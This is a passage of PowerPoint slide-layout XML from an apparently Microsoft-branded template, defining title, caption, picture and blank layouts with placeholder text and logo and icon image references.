          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Page#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="icon-glossary.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8352410" y="48640"/>
            <a:ext cx="285750" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5614430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7 Title_Subtitle Only">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"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a:xfrm>
            <a:off x="304800" y="228600"/>
            <a:ext cx="8534400" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="636232"/>
            <a:ext cx="8534400" cy="506767"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"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6" name="Picture 15" descr="MSSVC_wL_Transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="6419088"/>
            <a:ext cx="2081571" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24"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
        <p:nvSpPr>
          <p:cNvPr id="25"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6"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3310666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7# Title_Subtitle Only">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"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a:xfrm>
            <a:off x="304800" y="228600"/>
            <a:ext cx="8534400" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="636232"/>
            <a:ext cx="8534400" cy="506767"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"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6" name="Picture 15" descr="MSSVC_wL_Transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="6419088"/>
            <a:ext cx="2081571" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24"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
        <p:nvSpPr>
          <p:cNvPr id="25"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6"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
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8659240" y="128728"/>
            <a:ext cx="457200" cy="195528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Page#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="icon-glossary.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8352410" y="48640"/>
            <a:ext cx="285750" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31662774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8 Topic Title_Caption_Picture">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"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a:xfrm>
            <a:off x="304800" y="273050"/>
            <a:ext cx="3200400" cy="717550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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304800" y="1066800"/>
            <a:ext cx="3200400" cy="5165023"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="228600" indent="-228600">
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>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12" name="Picture 11"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7" name="Picture 16" descr="MSSVC_wL_Transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="6419088"/>
            <a:ext cx="2081571" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26"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7"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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Picture Placeholder 14"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3575304" y="274320"/>
            <a:ext cx="5111496" cy="5980176"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13301438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8# Topic Title_Caption_Picture">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"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a:xfrm>
            <a:off x="304800" y="273050"/>
            <a:ext cx="3200400" cy="717550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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304800" y="1066800"/>
            <a:ext cx="3200400" cy="5165023"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="228600" indent="-228600">
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>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12" name="Picture 11"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7" name="Picture 16" descr="MSSVC_wL_Transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="6419088"/>
            <a:ext cx="2081571" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26"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7"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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8659240" y="128728"/>
            <a:ext cx="457200" cy="195528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Page#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="icon-glossary.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8352410" y="48640"/>
            <a:ext cx="285750" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Picture Placeholder 14"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3575304" y="274320"/>
            <a:ext cx="5111496" cy="5980176"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26523125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2.9 Picture_Caption_Text">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"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a:xfrm>
            <a:off x="533400" y="4953000"/>
            <a:ext cx="8229600" cy="566738"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1600" b="1">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228600" y="228600"/>
            <a:ext cx="8686800" cy="4648200"/>
          </a:xfr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533400" y="5529466"/>
            <a:ext cx="8229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12" name="Picture 11"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7" name="Picture 16" descr="MSSVC_wL_Transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7062429" y="6419088"/>
            <a:ext cx="2081571" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25"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
        <p:nvSpPr>
          <p:cNvPr id="26"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7"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38065538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9# Picture_Caption_Text">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"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a:xfrm>
            <a:off x="533400" y="4953000"/>
            <a:ext cx="8229600" cy="566738"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1600" b="1">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228600" y="228600"/>
            <a:ext cx="8686800" cy="4648200"/>
          </a:xfr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533400" y="5529466"/>
            <a:ext cx="8229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12" name="Picture 11"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7" name="Picture 16" descr="MSSVC_wL_Transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7062429" y="6419088"/>
            <a:ext cx="2081571" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25"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
        <p:nvSpPr>
          <p:cNvPr id="26"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7"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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8659240" y="128728"/>
            <a:ext cx="457200" cy="195528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Page#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="icon-glossary.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8352410" y="48640"/>
            <a:ext cx="285750" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20459066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2.10 Blank">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="SMSGR-Inside-top.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="137246"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"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4" name="Picture 13" descr="MSSVC_wL_Transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="6419088"/>
            <a:ext cx="2081571" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23"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4"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
        <p:nvSpPr>
          <p:cNvPr id="8"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13358687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10# Blank">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="SMSGR-Inside-top.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="137246"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"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4" name="Picture 13" descr="MSSVC_wL_Transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="6419088"/>
            <a:ext cx="2081571" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23"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4"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
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8659240" y="128728"/>
            <a:ext cx="457200" cy="195528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Page#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="icon-glossary.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8352410" y="48640"/>
            <a:ext cx="285750" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25936018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MS-Closing Pic1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 3" descr="Microsoft logo with new tagline black"/>
          <p:cNvPicPr>
